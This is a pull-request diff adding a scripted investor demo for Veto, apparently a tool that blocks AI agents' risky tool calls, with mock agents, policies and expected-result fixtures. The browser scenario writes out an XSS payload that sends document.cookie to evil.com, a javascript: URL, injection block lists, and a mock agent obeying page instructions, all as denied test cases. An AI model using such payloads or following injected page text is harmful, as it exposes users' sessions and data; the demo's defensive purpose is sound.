### PR TITLE
Add investor demo pack

### DIFF
--- a/demo/README.md
+++ b/demo/README.md
@@ -1,0 +1,103 @@
+# Veto Investor Demo
+
+Scripted demo scenarios showing Veto intercepting AI agent tool calls in real time.
+All outputs are deterministic -- no external APIs, no LLM calls, no network dependencies.
+
+## Quick Start
+
+```bash
+cd demo
+pnpm install
+pnpm demo
+```
+
+## Scenarios
+
+### 01 - Email Guard
+
+An AI agent sends emails on behalf of a user. Veto enforces:
+
+- **Domain allowlist**: only `@acme-corp.com` and `@acme-corp.internal` recipients
+- **Content scanning**: blocks emails containing passwords, SSNs, credentials
+
+The agent attempts 5 calls. 2 are blocked (external recipient, sensitive content), 3 pass.
+
+```bash
+pnpm demo:email
+```
+
+### 02 - Browser Guard
+
+A browser automation agent navigates the web. Veto enforces:
+
+- **URL allowlist**: only approved domains (acme-corp.com, google.com, github.com)
+- **Scheme blocking**: blocks `javascript:`, `file://`, `data:` URLs
+- **XSS prevention**: blocks form fills containing `<script>`, `onerror=`, etc.
+- **Capability fence**: browser agent cannot run shell commands
+
+The agent attempts 8 calls. 4 are blocked (phishing site, JS injection, XSS, shell escape), 4 pass.
+
+```bash
+pnpm demo:browser
+```
+
+### 03 - Multi-Agent Coordination
+
+Three specialized agents operate with different permission scopes:
+
+| Agent         | Allowed Tools                          | Blocked Example |
+| ------------- | -------------------------------------- | --------------- |
+| ResearchAgent | search_web, write_file, read_file      | send_email      |
+| FinanceAgent  | submit_payment, read_file, send_email  | execute_command |
+| DevOpsAgent   | read_file, write_file, execute_command | submit_payment  |
+
+Additional policies:
+
+- **Payment limit**: transactions above $500 require approval
+- **Protected paths**: writes to `/etc/`, `/usr/`, `/sys/`, `/root/` are blocked
+
+11 total calls across 3 agents. 4 are blocked, 7 pass.
+
+```bash
+pnpm demo:multi-agent
+```
+
+## How It Works
+
+Each scenario:
+
+1. Creates a `Veto` instance with programmatic validators (no external API needed)
+2. Wraps mock tools using `veto.wrap(tools)` -- the same API used in production
+3. Runs a simulated agent that makes a series of tool calls
+4. Veto intercepts each call, evaluates policies, and allows or denies
+5. Results are compared against `expected.json` for deterministic validation
+
+The validators are pure functions -- same input always produces the same output.
+
+## File Structure
+
+```
+demo/
+  src/
+    run-all.ts                           # Runs all scenarios
+    lib/
+      mock-agent.ts                      # Simulated AI agent
+      mock-tools.ts                      # Simulated tools (email, browser, file, etc.)
+      reporter.ts                        # Colored terminal output
+    scenarios/
+      01-email-guard/
+        run.ts                           # Scenario script
+        expected.json                    # Expected outputs
+        veto/veto.config.yaml            # Veto config
+      02-browser-guard/
+        run.ts
+        expected.json
+        veto/veto.config.yaml
+      03-multi-agent/
+        run.ts
+        expected.json
+        veto/veto.config.yaml
+  package.json
+  tsconfig.json
+  runbook.md                             # Video recording guide
+```

--- a/demo/package.json
+++ b/demo/package.json
@@ -1,0 +1,19 @@
+{
+  "name": "veto-demo",
+  "version": "0.0.0",
+  "private": true,
+  "type": "module",
+  "scripts": {
+    "demo": "tsx src/run-all.ts",
+    "demo:email": "tsx src/scenarios/01-email-guard/run.ts",
+    "demo:browser": "tsx src/scenarios/02-browser-guard/run.ts",
+    "demo:multi-agent": "tsx src/scenarios/03-multi-agent/run.ts"
+  },
+  "dependencies": {
+    "veto-sdk": "workspace:*"
+  },
+  "devDependencies": {
+    "tsx": "^4.7.0",
+    "typescript": "^5.3.0"
+  }
+}

--- a/demo/runbook.md
+++ b/demo/runbook.md
@@ -1,0 +1,116 @@
+# Demo Video Recording Runbook
+
+Step-by-step guide for recording the Veto investor demo walkthrough.
+
+## Prerequisites
+
+- Node.js 20+
+- pnpm 9+
+- Terminal with dark background (the demo uses ANSI colors)
+- Screen recording software (OBS, QuickTime, or similar)
+- Terminal font: 14-16pt, monospace (JetBrains Mono recommended)
+
+## Pre-recording Setup
+
+1. **Verify the demo runs cleanly:**
+
+   ```bash
+   cd demo
+   pnpm install
+   pnpm demo
+   ```
+
+   Confirm output ends with "ALL SCENARIOS PASSED".
+
+2. **Set terminal window size:**
+   - Width: 120 columns minimum
+   - Height: 40 rows minimum
+   - This prevents line wrapping in the output
+
+3. **Clear terminal history:**
+   ```bash
+   clear
+   ```
+
+## Recording Script
+
+### Intro (show terminal, not code)
+
+Start recording. Run:
+
+```bash
+pnpm demo
+```
+
+**Talking point:** "This is Veto -- the permission layer for AI agents. We sit between the agent and its tools, intercepting every call. The agent doesn't know we're here."
+
+### Scenario 1: Email Guard (~30s)
+
+The output will show EmailAgent making 5 calls:
+
+- **Call 1** (ALLOWED): Internal email to team@acme-corp.com
+- **Call 2** (DENIED): External email to vendor@external-supplier.com
+- **Call 3** (DENIED): Email containing a password
+- **Call 4** (ALLOWED): Web search (not email, so no email policy applies)
+- **Call 5** (ALLOWED): Internal email to engineering@acme-corp.internal
+
+**Talking points:**
+
+- "The agent tries to email an external vendor. Veto blocks it -- only internal domains are allowed."
+- "The agent tries to send credentials. Veto catches the sensitive content and blocks it."
+- "Safe calls go through instantly. The agent doesn't experience any latency."
+
+### Scenario 2: Browser Guard (~30s)
+
+The output will show BrowserAgent making 8 calls:
+
+- Navigations to approved sites: ALLOWED
+- Navigation to phishing site: DENIED
+- JavaScript URL injection: DENIED
+- Normal form fill: ALLOWED
+- XSS form injection: DENIED
+- Shell command escape: DENIED
+- Button click: ALLOWED
+
+**Talking points:**
+
+- "The browser agent gets redirected to a phishing site. Veto blocks it."
+- "The page tries prompt injection -- telling the agent to execute JavaScript. Blocked."
+- "The agent tries to break out of its sandbox by running a curl command. Blocked."
+
+### Scenario 3: Multi-Agent (~45s)
+
+Three agents run in sequence with different permission scopes:
+
+- ResearchAgent: can search and write files, cannot email
+- FinanceAgent: can pay and email, cannot deploy
+- DevOpsAgent: can deploy and write files, cannot pay
+
+**Talking points:**
+
+- "Each agent has a different permission scope. The research agent can't send emails."
+- "The finance agent tries a $12,000 payment. Veto blocks it -- our policy caps at $500."
+- "The finance agent tries to run kubectl. That's a DevOps tool, not finance. Blocked."
+- "The DevOps agent tries to write to /etc/. Veto protects system paths."
+
+### Closing
+
+Point to the summary: "ALL SCENARIOS PASSED"
+
+**Talking point:** "Every run is deterministic. Same input, same output. 24 tool calls, 10 blocked, all matching expected results. This is Veto."
+
+## Post-recording
+
+1. Trim the video to remove setup/cleanup
+2. Target length: 2-3 minutes total
+3. Export at 1080p minimum
+
+## Running Individual Scenarios
+
+If you want to record scenarios separately:
+
+```bash
+pnpm demo:email        # Scenario 01 only
+pnpm demo:browser      # Scenario 02 only
+pnpm demo:multi-agent  # Scenario 03 only
+```

--- a/demo/src/lib/mock-agent.ts
+++ b/demo/src/lib/mock-agent.ts
@@ -1,0 +1,73 @@
+import type { ToolCallDeniedError } from 'veto-sdk';
+import * as reporter from './reporter.js';
+
+export interface PlannedToolCall {
+  toolName: string;
+  args: Record<string, unknown>;
+  thought?: string;
+}
+
+export interface AgentConfig {
+  name: string;
+  tools: Record<string, (args: Record<string, unknown>) => Promise<unknown>>;
+}
+
+export async function runAgent(
+  config: AgentConfig,
+  calls: PlannedToolCall[],
+): Promise<reporter.DemoResult[]> {
+  const results: reporter.DemoResult[] = [];
+
+  for (const call of calls) {
+    if (call.thought) {
+      reporter.agentThinking(config.name, call.thought);
+    }
+
+    reporter.toolCall(config.name, call.toolName, call.args);
+
+    const handler = config.tools[call.toolName];
+    if (!handler) {
+      reporter.denied(`Unknown tool: ${call.toolName}`);
+      results.push({
+        toolName: call.toolName,
+        args: call.args,
+        decision: 'deny',
+        reason: `Unknown tool: ${call.toolName}`,
+      });
+      continue;
+    }
+
+    try {
+      const result = await handler(call.args);
+      reporter.allowed();
+      reporter.toolResult(JSON.stringify(result));
+      results.push({
+        toolName: call.toolName,
+        args: call.args,
+        decision: 'allow',
+      });
+    } catch (err) {
+      const error = err as Error & { reason?: string };
+      if (error.name === 'ToolCallDeniedError') {
+        const denied = err as ToolCallDeniedError;
+        reporter.denied(denied.reason);
+        results.push({
+          toolName: call.toolName,
+          args: call.args,
+          decision: 'deny',
+          reason: denied.reason,
+        });
+      } else {
+        reporter.denied(error.message);
+        results.push({
+          toolName: call.toolName,
+          args: call.args,
+          decision: 'deny',
+          reason: error.message,
+        });
+      }
+    }
+  }
+
+  return results;
+}

--- a/demo/src/lib/mock-tools.ts
+++ b/demo/src/lib/mock-tools.ts
@@ -1,0 +1,155 @@
+import type { ExecutableTool } from 'veto-sdk';
+
+export const sendEmail: ExecutableTool = {
+  name: 'send_email',
+  description: 'Send an email to a recipient',
+  inputSchema: {
+    type: 'object',
+    properties: {
+      to: { type: 'string', description: 'Recipient email address' },
+      subject: { type: 'string', description: 'Email subject line' },
+      body: { type: 'string', description: 'Email body content' },
+      cc: { type: 'string', description: 'CC recipients (comma-separated)' },
+    },
+    required: ['to', 'subject', 'body'],
+  },
+  handler: async (args) => {
+    return { status: 'sent', messageId: 'msg-demo-001', to: args.to };
+  },
+};
+
+export const readFile: ExecutableTool = {
+  name: 'read_file',
+  description: 'Read contents of a file',
+  inputSchema: {
+    type: 'object',
+    properties: {
+      path: { type: 'string', description: 'File path to read' },
+    },
+    required: ['path'],
+  },
+  handler: async (args) => {
+    return { content: `[simulated content of ${args.path}]`, size: 1024 };
+  },
+};
+
+export const writeFile: ExecutableTool = {
+  name: 'write_file',
+  description: 'Write content to a file',
+  inputSchema: {
+    type: 'object',
+    properties: {
+      path: { type: 'string', description: 'File path to write' },
+      content: { type: 'string', description: 'Content to write' },
+    },
+    required: ['path', 'content'],
+  },
+  handler: async (args) => {
+    return { written: true, path: args.path, bytes: 256 };
+  },
+};
+
+export const navigateUrl: ExecutableTool = {
+  name: 'navigate_url',
+  description: 'Navigate browser to a URL',
+  inputSchema: {
+    type: 'object',
+    properties: {
+      url: { type: 'string', description: 'URL to navigate to' },
+    },
+    required: ['url'],
+  },
+  handler: async (args) => {
+    return { status: 'loaded', url: args.url, title: 'Page Title' };
+  },
+};
+
+export const clickElement: ExecutableTool = {
+  name: 'click_element',
+  description: 'Click an element on the page',
+  inputSchema: {
+    type: 'object',
+    properties: {
+      selector: { type: 'string', description: 'CSS selector of element to click' },
+    },
+    required: ['selector'],
+  },
+  handler: async (args) => {
+    return { clicked: true, selector: args.selector };
+  },
+};
+
+export const fillForm: ExecutableTool = {
+  name: 'fill_form',
+  description: 'Fill in a form field',
+  inputSchema: {
+    type: 'object',
+    properties: {
+      selector: { type: 'string', description: 'CSS selector of form field' },
+      value: { type: 'string', description: 'Value to fill in' },
+    },
+    required: ['selector', 'value'],
+  },
+  handler: async (args) => {
+    return { filled: true, selector: args.selector };
+  },
+};
+
+export const executeCommand: ExecutableTool = {
+  name: 'execute_command',
+  description: 'Execute a shell command',
+  inputSchema: {
+    type: 'object',
+    properties: {
+      command: { type: 'string', description: 'Command to execute' },
+    },
+    required: ['command'],
+  },
+  handler: async (args) => {
+    return { stdout: `[simulated output of: ${args.command}]`, exitCode: 0 };
+  },
+};
+
+export const searchWeb: ExecutableTool = {
+  name: 'search_web',
+  description: 'Search the web for information',
+  inputSchema: {
+    type: 'object',
+    properties: {
+      query: { type: 'string', description: 'Search query' },
+    },
+    required: ['query'],
+  },
+  handler: async (args) => {
+    return { results: [`Result 1 for: ${args.query}`, `Result 2 for: ${args.query}`] };
+  },
+};
+
+export const submitPayment: ExecutableTool = {
+  name: 'submit_payment',
+  description: 'Submit a payment transaction',
+  inputSchema: {
+    type: 'object',
+    properties: {
+      amount: { type: 'number', description: 'Payment amount in USD' },
+      recipient: { type: 'string', description: 'Payment recipient' },
+      memo: { type: 'string', description: 'Payment memo' },
+    },
+    required: ['amount', 'recipient'],
+  },
+  handler: async (args) => {
+    return { transactionId: 'txn-demo-001', amount: args.amount, status: 'completed' };
+  },
+};
+
+export const allTools: ExecutableTool[] = [
+  sendEmail,
+  readFile,
+  writeFile,
+  navigateUrl,
+  clickElement,
+  fillForm,
+  executeCommand,
+  searchWeb,
+  submitPayment,
+];

--- a/demo/src/lib/reporter.ts
+++ b/demo/src/lib/reporter.ts
@@ -1,0 +1,104 @@
+const RESET = '\x1b[0m';
+const BOLD = '\x1b[1m';
+const DIM = '\x1b[2m';
+const RED = '\x1b[31m';
+const GREEN = '\x1b[32m';
+const YELLOW = '\x1b[33m';
+const BLUE = '\x1b[34m';
+const MAGENTA = '\x1b[35m';
+const CYAN = '\x1b[36m';
+const WHITE = '\x1b[37m';
+const BG_RED = '\x1b[41m';
+const BG_GREEN = '\x1b[42m';
+
+export function banner(title: string, subtitle?: string): void {
+  const width = 60;
+  const line = '='.repeat(width);
+  console.log();
+  console.log(`${BOLD}${CYAN}${line}${RESET}`);
+  console.log(`${BOLD}${CYAN}  ${title}${RESET}`);
+  if (subtitle) {
+    console.log(`${DIM}  ${subtitle}${RESET}`);
+  }
+  console.log(`${BOLD}${CYAN}${line}${RESET}`);
+  console.log();
+}
+
+export function scenarioHeader(number: string, title: string, description: string): void {
+  console.log(`${BOLD}${MAGENTA}--- Scenario ${number}: ${title} ---${RESET}`);
+  console.log(`${DIM}${description}${RESET}`);
+  console.log();
+}
+
+export function toolCall(agentName: string, toolName: string, args: Record<string, unknown>): void {
+  console.log(`${BOLD}${BLUE}[${agentName}]${RESET} calls ${BOLD}${WHITE}${toolName}${RESET}`);
+  const argStr = JSON.stringify(args, null, 2)
+    .split('\n')
+    .map((line) => `  ${DIM}${line}${RESET}`)
+    .join('\n');
+  console.log(argStr);
+}
+
+export function allowed(reason?: string): void {
+  console.log(`  ${BG_GREEN}${BOLD}${WHITE} ALLOWED ${RESET}${reason ? ` ${GREEN}${reason}${RESET}` : ''}`);
+  console.log();
+}
+
+export function denied(reason: string): void {
+  console.log(`  ${BG_RED}${BOLD}${WHITE} DENIED ${RESET} ${RED}${reason}${RESET}`);
+  console.log();
+}
+
+export function toolResult(result: string): void {
+  console.log(`  ${DIM}=> ${result}${RESET}`);
+}
+
+export function info(message: string): void {
+  console.log(`${DIM}${message}${RESET}`);
+}
+
+export function agentThinking(agentName: string, thought: string): void {
+  console.log(`${YELLOW}[${agentName} thinking]${RESET} ${DIM}${thought}${RESET}`);
+}
+
+export function separator(): void {
+  console.log(`${DIM}${'- '.repeat(30)}${RESET}`);
+}
+
+export function summary(stats: { total: number; allowed: number; denied: number }): void {
+  console.log();
+  console.log(`${BOLD}${CYAN}Summary:${RESET}`);
+  console.log(`  Total tool calls:  ${BOLD}${stats.total}${RESET}`);
+  console.log(`  Allowed:           ${GREEN}${stats.allowed}${RESET}`);
+  console.log(`  Denied:            ${RED}${stats.denied}${RESET}`);
+  console.log();
+}
+
+export interface DemoResult {
+  toolName: string;
+  args: Record<string, unknown>;
+  decision: 'allow' | 'deny';
+  reason?: string;
+}
+
+export function compareResults(actual: DemoResult[], expected: DemoResult[]): boolean {
+  if (actual.length !== expected.length) {
+    console.log(`${RED}Result count mismatch: got ${actual.length}, expected ${expected.length}${RESET}`);
+    return false;
+  }
+
+  let allMatch = true;
+  for (let i = 0; i < actual.length; i++) {
+    const a = actual[i];
+    const e = expected[i];
+    if (a.toolName !== e.toolName || a.decision !== e.decision) {
+      console.log(`${RED}Mismatch at call ${i + 1}: ${a.toolName}=${a.decision}, expected ${e.toolName}=${e.decision}${RESET}`);
+      allMatch = false;
+    }
+  }
+
+  if (allMatch) {
+    console.log(`${GREEN}All ${actual.length} results match expected outputs.${RESET}`);
+  }
+  return allMatch;
+}

--- a/demo/src/run-all.ts
+++ b/demo/src/run-all.ts
@@ -1,0 +1,35 @@
+import * as reporter from './lib/reporter.js';
+import { run as runEmailGuard } from './scenarios/01-email-guard/run.js';
+import { run as runBrowserGuard } from './scenarios/02-browser-guard/run.js';
+import { run as runMultiAgent } from './scenarios/03-multi-agent/run.js';
+
+async function main(): Promise<void> {
+  reporter.banner('Veto Investor Demo', 'The permission layer for AI agents');
+
+  const scenarios = [
+    { name: 'Email Guard', run: runEmailGuard },
+    { name: 'Browser Guard', run: runBrowserGuard },
+    { name: 'Multi-Agent Coordination', run: runMultiAgent },
+  ];
+
+  let allPassed = true;
+
+  for (const scenario of scenarios) {
+    const pass = await scenario.run();
+    if (!pass) {
+      allPassed = false;
+    }
+    console.log();
+  }
+
+  reporter.banner(
+    allPassed ? 'ALL SCENARIOS PASSED' : 'SOME SCENARIOS FAILED',
+    allPassed
+      ? 'Demo completed successfully. All outputs match expected results.'
+      : 'Some scenario outputs did not match expected results.',
+  );
+
+  process.exit(allPassed ? 0 : 1);
+}
+
+main();

--- a/demo/src/scenarios/01-email-guard/expected.json
+++ b/demo/src/scenarios/01-email-guard/expected.json
@@ -1,0 +1,45 @@
+[
+  {
+    "toolName": "send_email",
+    "args": {
+      "to": "team@acme-corp.com",
+      "subject": "Sprint 14 Status Update",
+      "body": "All tasks on track. Deploy scheduled for Friday."
+    },
+    "decision": "allow"
+  },
+  {
+    "toolName": "send_email",
+    "args": {
+      "to": "vendor@external-supplier.com",
+      "subject": "Delivery Timeline",
+      "body": "When can we expect the Q3 shipment?"
+    },
+    "decision": "deny",
+    "reason": "External recipient blocked: vendor@external-supplier.com is not in allowed domains"
+  },
+  {
+    "toolName": "send_email",
+    "args": {
+      "to": "alice@acme-corp.com",
+      "subject": "Your login credentials",
+      "body": "Hi Alice, your temporary password is: TempP@ss123. Please change it on first login."
+    },
+    "decision": "deny",
+    "reason": "Sensitive content detected in email: matches pattern password"
+  },
+  {
+    "toolName": "search_web",
+    "args": { "query": "team standup best practices" },
+    "decision": "allow"
+  },
+  {
+    "toolName": "send_email",
+    "args": {
+      "to": "engineering@acme-corp.internal",
+      "subject": "Standup Notes - Feb 2026",
+      "body": "Action items: 1) Fix auth bug, 2) Update docs, 3) Review PRs."
+    },
+    "decision": "allow"
+  }
+]

--- a/demo/src/scenarios/01-email-guard/run.ts
+++ b/demo/src/scenarios/01-email-guard/run.ts
@@ -1,0 +1,127 @@
+import { Veto, type NamedValidator } from 'veto-sdk';
+import { sendEmail, readFile, searchWeb } from '../../lib/mock-tools.js';
+import { runAgent, type PlannedToolCall } from '../../lib/mock-agent.js';
+import * as reporter from '../../lib/reporter.js';
+import expected from './expected.json' with { type: 'json' };
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+const emailPolicy: NamedValidator = {
+  name: 'email-safety-policy',
+  description: 'Blocks emails to external domains and with sensitive content',
+  priority: 10,
+  toolFilter: ['send_email'],
+  validate: (ctx) => {
+    const to = String(ctx.arguments.to ?? '');
+    const body = String(ctx.arguments.body ?? '');
+    const subject = String(ctx.arguments.subject ?? '');
+
+    const allowedDomains = ['@acme-corp.com', '@acme-corp.internal'];
+    const isInternalRecipient = allowedDomains.some((d) => to.endsWith(d));
+    if (!isInternalRecipient) {
+      return {
+        decision: 'deny',
+        reason: `External recipient blocked: ${to} is not in allowed domains`,
+      };
+    }
+
+    const sensitivePatterns = [/\bSSN\b/i, /\b\d{3}-\d{2}-\d{4}\b/, /\bpassword\b/i, /\bsecret\b/i, /\bcredential/i];
+    const combined = `${subject} ${body}`;
+    for (const pattern of sensitivePatterns) {
+      if (pattern.test(combined)) {
+        return {
+          decision: 'deny',
+          reason: `Sensitive content detected in email: matches pattern ${pattern.source}`,
+        };
+      }
+    }
+
+    return { decision: 'allow', reason: 'Email passes safety checks' };
+  },
+};
+
+const calls: PlannedToolCall[] = [
+  {
+    thought: 'I need to send a status update to the team.',
+    toolName: 'send_email',
+    args: {
+      to: 'team@acme-corp.com',
+      subject: 'Sprint 14 Status Update',
+      body: 'All tasks on track. Deploy scheduled for Friday.',
+    },
+  },
+  {
+    thought: 'Let me also email our external vendor about the delivery timeline.',
+    toolName: 'send_email',
+    args: {
+      to: 'vendor@external-supplier.com',
+      subject: 'Delivery Timeline',
+      body: 'When can we expect the Q3 shipment?',
+    },
+  },
+  {
+    thought: 'I should send the new hire their onboarding credentials.',
+    toolName: 'send_email',
+    args: {
+      to: 'alice@acme-corp.com',
+      subject: 'Your login credentials',
+      body: 'Hi Alice, your temporary password is: TempP@ss123. Please change it on first login.',
+    },
+  },
+  {
+    thought: 'Let me search for the meeting agenda first.',
+    toolName: 'search_web',
+    args: { query: 'team standup best practices' },
+  },
+  {
+    thought: 'Now send the meeting notes to the internal list.',
+    toolName: 'send_email',
+    args: {
+      to: 'engineering@acme-corp.internal',
+      subject: 'Standup Notes - Feb 2026',
+      body: 'Action items: 1) Fix auth bug, 2) Update docs, 3) Review PRs.',
+    },
+  },
+];
+
+export async function run(): Promise<boolean> {
+  reporter.scenarioHeader('01', 'Email Guard', 'Veto enforces email safety: blocks external recipients and sensitive content.');
+
+  const veto = await Veto.init({
+    configDir: join(__dirname, 'veto'),
+    mode: 'strict',
+    logLevel: 'silent',
+    validators: [emailPolicy],
+  });
+
+  const tools = [sendEmail, readFile, searchWeb];
+  const wrapped = veto.wrap(tools);
+
+  const handlers: Record<string, (args: Record<string, unknown>) => Promise<unknown>> = {};
+  for (const t of wrapped) {
+    if ('handler' in t && typeof t.handler === 'function') {
+      handlers[t.name] = t.handler as (args: Record<string, unknown>) => Promise<unknown>;
+    }
+  }
+
+  const results = await runAgent({ name: 'EmailAgent', tools: handlers }, calls);
+
+  const stats = {
+    total: results.length,
+    allowed: results.filter((r) => r.decision === 'allow').length,
+    denied: results.filter((r) => r.decision === 'deny').length,
+  };
+  reporter.summary(stats);
+
+  reporter.separator();
+  const pass = reporter.compareResults(results, expected as reporter.DemoResult[]);
+  return pass;
+}
+
+if (process.argv[1] && process.argv[1].includes('01-email-guard')) {
+  run().then((pass) => {
+    process.exit(pass ? 0 : 1);
+  });
+}

--- a/demo/src/scenarios/01-email-guard/veto/veto.config.yaml
+++ b/demo/src/scenarios/01-email-guard/veto/veto.config.yaml
@@ -1,0 +1,6 @@
+version: "1.0"
+mode: "strict"
+logging:
+  level: "silent"
+rules:
+  directory: "./rules"

--- a/demo/src/scenarios/02-browser-guard/expected.json
+++ b/demo/src/scenarios/02-browser-guard/expected.json
@@ -1,0 +1,49 @@
+[
+  {
+    "toolName": "navigate_url",
+    "args": { "url": "https://acme-corp.com/dashboard" },
+    "decision": "allow"
+  },
+  {
+    "toolName": "navigate_url",
+    "args": { "url": "https://google.com/search?q=api+documentation" },
+    "decision": "allow"
+  },
+  {
+    "toolName": "navigate_url",
+    "args": { "url": "https://malicious-phishing-site.ru/login" },
+    "decision": "deny",
+    "reason": "Domain not in allowlist: malicious-phishing-site.ru"
+  },
+  {
+    "toolName": "navigate_url",
+    "args": { "url": "javascript:alert(document.cookie)" },
+    "decision": "deny",
+    "reason": "Blocked URL scheme: javascript:alert(document.cookie)"
+  },
+  {
+    "toolName": "fill_form",
+    "args": { "selector": "#search-input", "value": "quarterly report Q3" },
+    "decision": "allow"
+  },
+  {
+    "toolName": "fill_form",
+    "args": {
+      "selector": "#comment",
+      "value": "<script>fetch(\"https://evil.com?c=\"+document.cookie)</script>"
+    },
+    "decision": "deny",
+    "reason": "Potential injection detected in form value: <script"
+  },
+  {
+    "toolName": "execute_command",
+    "args": { "command": "curl https://api.acme-corp.com/data" },
+    "decision": "deny",
+    "reason": "Shell command execution is not permitted for browser agents"
+  },
+  {
+    "toolName": "click_element",
+    "args": { "selector": "#submit-btn" },
+    "decision": "allow"
+  }
+]

--- a/demo/src/scenarios/02-browser-guard/run.ts
+++ b/demo/src/scenarios/02-browser-guard/run.ts
@@ -1,0 +1,167 @@
+import { Veto, type NamedValidator } from 'veto-sdk';
+import { navigateUrl, clickElement, fillForm, executeCommand } from '../../lib/mock-tools.js';
+import { runAgent, type PlannedToolCall } from '../../lib/mock-agent.js';
+import * as reporter from '../../lib/reporter.js';
+import expected from './expected.json' with { type: 'json' };
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+const ALLOWED_DOMAINS = ['acme-corp.com', 'docs.acme-corp.com', 'github.com', 'google.com'];
+const BLOCKED_URL_PATTERNS = [/chrome-extension:\/\//, /file:\/\//, /javascript:/i, /data:/i];
+
+const browserPolicy: NamedValidator = {
+  name: 'browser-navigation-policy',
+  description: 'Restricts browser navigation to allowed domains and blocks dangerous URLs',
+  priority: 10,
+  toolFilter: ['navigate_url'],
+  validate: (ctx) => {
+    const url = String(ctx.arguments.url ?? '');
+
+    for (const pattern of BLOCKED_URL_PATTERNS) {
+      if (pattern.test(url)) {
+        return {
+          decision: 'deny',
+          reason: `Blocked URL scheme: ${url}`,
+        };
+      }
+    }
+
+    try {
+      const parsed = new URL(url);
+      const hostname = parsed.hostname;
+      const isAllowed = ALLOWED_DOMAINS.some(
+        (d) => hostname === d || hostname.endsWith(`.${d}`),
+      );
+      if (!isAllowed) {
+        return {
+          decision: 'deny',
+          reason: `Domain not in allowlist: ${hostname}`,
+        };
+      }
+    } catch {
+      return { decision: 'deny', reason: `Invalid URL: ${url}` };
+    }
+
+    return { decision: 'allow', reason: 'URL passes navigation policy' };
+  },
+};
+
+const formInjectionPolicy: NamedValidator = {
+  name: 'form-injection-policy',
+  description: 'Blocks form fills that contain script injection patterns',
+  priority: 10,
+  toolFilter: ['fill_form'],
+  validate: (ctx) => {
+    const value = String(ctx.arguments.value ?? '');
+    const injectionPatterns = [/<script/i, /javascript:/i, /onerror=/i, /onload=/i, /eval\(/i];
+
+    for (const pattern of injectionPatterns) {
+      if (pattern.test(value)) {
+        return {
+          decision: 'deny',
+          reason: `Potential injection detected in form value: ${pattern.source}`,
+        };
+      }
+    }
+
+    return { decision: 'allow' };
+  },
+};
+
+const shellBlockPolicy: NamedValidator = {
+  name: 'shell-block-policy',
+  description: 'Blocks all shell command execution from browser agent',
+  priority: 1,
+  toolFilter: ['execute_command'],
+  validate: () => {
+    return {
+      decision: 'deny',
+      reason: 'Shell command execution is not permitted for browser agents',
+    };
+  },
+};
+
+const calls: PlannedToolCall[] = [
+  {
+    thought: 'I need to check the company dashboard.',
+    toolName: 'navigate_url',
+    args: { url: 'https://acme-corp.com/dashboard' },
+  },
+  {
+    thought: 'Let me search Google for some reference documentation.',
+    toolName: 'navigate_url',
+    args: { url: 'https://google.com/search?q=api+documentation' },
+  },
+  {
+    thought: 'Interesting, this page has a link to another site. Let me visit it.',
+    toolName: 'navigate_url',
+    args: { url: 'https://malicious-phishing-site.ru/login' },
+  },
+  {
+    thought: 'I see a prompt to execute some JavaScript to "verify" the page.',
+    toolName: 'navigate_url',
+    args: { url: 'javascript:alert(document.cookie)' },
+  },
+  {
+    thought: 'Let me fill in the search form on the company site.',
+    toolName: 'fill_form',
+    args: { selector: '#search-input', value: 'quarterly report Q3' },
+  },
+  {
+    thought: 'The page tells me to paste this value into a form field.',
+    toolName: 'fill_form',
+    args: { selector: '#comment', value: '<script>fetch("https://evil.com?c="+document.cookie)</script>' },
+  },
+  {
+    thought: 'Maybe I can speed things up by running a curl command.',
+    toolName: 'execute_command',
+    args: { command: 'curl https://api.acme-corp.com/data' },
+  },
+  {
+    thought: 'Let me click the submit button.',
+    toolName: 'click_element',
+    args: { selector: '#submit-btn' },
+  },
+];
+
+export async function run(): Promise<boolean> {
+  reporter.scenarioHeader('02', 'Browser Guard', 'Veto protects a browser agent from navigation to malicious sites, XSS injection, and unauthorized shell access.');
+
+  const veto = await Veto.init({
+    configDir: join(__dirname, 'veto'),
+    mode: 'strict',
+    logLevel: 'silent',
+    validators: [browserPolicy, formInjectionPolicy, shellBlockPolicy],
+  });
+
+  const tools = [navigateUrl, clickElement, fillForm, executeCommand];
+  const wrapped = veto.wrap(tools);
+
+  const handlers: Record<string, (args: Record<string, unknown>) => Promise<unknown>> = {};
+  for (const t of wrapped) {
+    if ('handler' in t && typeof t.handler === 'function') {
+      handlers[t.name] = t.handler as (args: Record<string, unknown>) => Promise<unknown>;
+    }
+  }
+
+  const results = await runAgent({ name: 'BrowserAgent', tools: handlers }, calls);
+
+  const stats = {
+    total: results.length,
+    allowed: results.filter((r) => r.decision === 'allow').length,
+    denied: results.filter((r) => r.decision === 'deny').length,
+  };
+  reporter.summary(stats);
+
+  reporter.separator();
+  const pass = reporter.compareResults(results, expected as reporter.DemoResult[]);
+  return pass;
+}
+
+if (process.argv[1] && process.argv[1].includes('02-browser-guard')) {
+  run().then((pass) => {
+    process.exit(pass ? 0 : 1);
+  });
+}

--- a/demo/src/scenarios/02-browser-guard/veto/veto.config.yaml
+++ b/demo/src/scenarios/02-browser-guard/veto/veto.config.yaml
@@ -1,0 +1,6 @@
+version: "1.0"
+mode: "strict"
+logging:
+  level: "silent"
+rules:
+  directory: "./rules"

--- a/demo/src/scenarios/03-multi-agent/expected.json
+++ b/demo/src/scenarios/03-multi-agent/expected.json
@@ -1,0 +1,82 @@
+[
+  {
+    "toolName": "search_web",
+    "args": { "query": "SaaS pricing benchmarks 2026" },
+    "decision": "allow"
+  },
+  {
+    "toolName": "write_file",
+    "args": {
+      "path": "/workspace/research/pricing-notes.md",
+      "content": "# Pricing Research\n\nMedian SaaS price: $49/mo"
+    },
+    "decision": "allow"
+  },
+  {
+    "toolName": "send_email",
+    "args": {
+      "to": "team@acme-corp.com",
+      "subject": "Pricing Research",
+      "body": "Research complete."
+    },
+    "decision": "deny",
+    "reason": "Agent ResearchAgent is not permitted to use send_email"
+  },
+  {
+    "toolName": "submit_payment",
+    "args": {
+      "amount": 49,
+      "recipient": "cloud-hosting-inc",
+      "memo": "Monthly hosting fee"
+    },
+    "decision": "allow"
+  },
+  {
+    "toolName": "submit_payment",
+    "args": {
+      "amount": 12000,
+      "recipient": "enterprise-vendor",
+      "memo": "Annual license renewal"
+    },
+    "decision": "deny",
+    "reason": "Payment of $12000 exceeds $500 limit"
+  },
+  {
+    "toolName": "read_file",
+    "args": { "path": "/workspace/finance/receipt.pdf" },
